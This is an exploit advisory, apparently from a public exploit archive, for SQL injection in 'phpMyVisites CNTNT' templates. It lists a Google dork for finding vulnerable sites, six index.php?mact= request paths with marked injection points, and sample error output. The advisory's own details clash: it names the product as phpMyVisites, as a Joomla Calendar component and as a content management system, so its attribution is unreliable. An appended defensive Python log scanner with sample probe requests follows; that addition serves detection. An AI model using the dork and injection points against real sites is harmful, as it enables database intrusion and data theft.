- ####################################################################
- # Exploit Title : phpMyVisites CNTNT Templates 2.4 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : phpmyvisites.net
- # Software Download Link : phpmyvisites.net/telechargements.html
- # Software Information Link : phpmyvisites.net/support.html
- # Software Affected Versions : 2.0 - 2.x - 2.1 - 2.2 - 2.2 beta - 2.4 and all other previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/index.php?mact=
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- phpMyVisites is open source software and a content management system.
- ####################################################################
- # Impact :
- ***********
- phpMyVisites CNTNT Calendar 2.4 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?mact=Search,cntnt01,dosearch,0&cntnt01returnid=[SQL Injection]
- /index.php?mact=News,cntnt01,print,0&cntnt01articleid=[ID-NUMBER]&cntnt01showtemplate=false&cntnt01returnid=[SQL Injection]
- /index.php?mact=News,cntnt01,rss&cntnt01showtemplate=false&cntnt01category=&cntnt01number=[ID-NUMBER]&cntnt01returnid=[SQL Injection]
- /index.php?mact=Calendar,cntnt01,default,1&cntnt01year=[YEAR-NUMBER]&cntnt01month=[ID-NUMBER]&cntnt01returnid=[ID-NUMBER]&page=[SQL Injection]
- /index.php?mact=Calendar,cntnt01,default,1&cntnt01year=[YEAR-NUMBER]&cntnt01month=[ID-NUMBER]&cntnt01returnid=[ID-NUMBER]&seite=[SQL Injection]
- /index.php?mact=Calendar,cntnt01,default,0&cntnt01event_id=[ID-NUMBER]&cntnt01display=event&cntnt01lang=en_GB&cntnt01detailpage=&cntnt01return_id=[ID-NUMBER]&cntnt01returnid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Parameter 1 to cms_module_Lang() expected to be a
- reference, value given in /www/htdocs/w009d2d2/cms
- /lib/classes/class.module.inc.php on line 2003
- Deprecated: Function eregi_replace() is deprecated in
- /home/iogkfco/public_html/cms/include.php on line 252
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
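
For defenders reviewing web server logs against the request patterns listed above, the following is an added example (not part of the original advisory) that flags `mact=` requests whose `cntnt01returnid`, `page` or `seite` value is not a plain integer after percent-decoding. The combined log format, the integer-only assumption for these parameters, and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory marks as injection points. Assumption: legitimate
# values are plain integers (the advisory writes them as [ID-NUMBER]).
NUMERIC_PARAMS = {"cntnt01returnid", "page", "seite"}

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(uri):
    """Return [(name, decoded_value)] for monitored params that are not integers."""
    query = urlsplit(uri).query
    if "mact=" not in query:
        return []  # not a module request of the kind the advisory lists
    hits = []
    # parse_qsl percent-decodes, so %27 is seen as a quote character.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,10}", value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Yield (line_number, client_ip, hits) for each flagged log line."""
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            yield lineno, line.split(" ", 1)[0], hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2019:10:00:01 +0000] "GET /index.php?mact=News,cntnt01,rss&cntnt01showtemplate=false&cntnt01category=&cntnt01number=20&cntnt01returnid=15 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Feb/2019:10:00:05 +0000] "GET /index.php?mact=Search,cntnt01,dosearch,0&cntnt01returnid=60%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [14/Feb/2019:10:00:09 +0000] "GET /index.php?mact=Calendar,cntnt01,default,1&cntnt01year=2019&cntnt01month=2&cntnt01returnid=15&seite=15%27 HTTP/1.1" 200 804',
    '203.0.113.4 - - [14/Feb/2019:10:01:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for lineno, ip, hits in scan(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {hits}")
```

The same integer check, applied server-side before the value reaches any query, is the corresponding input-validation control for these parameters.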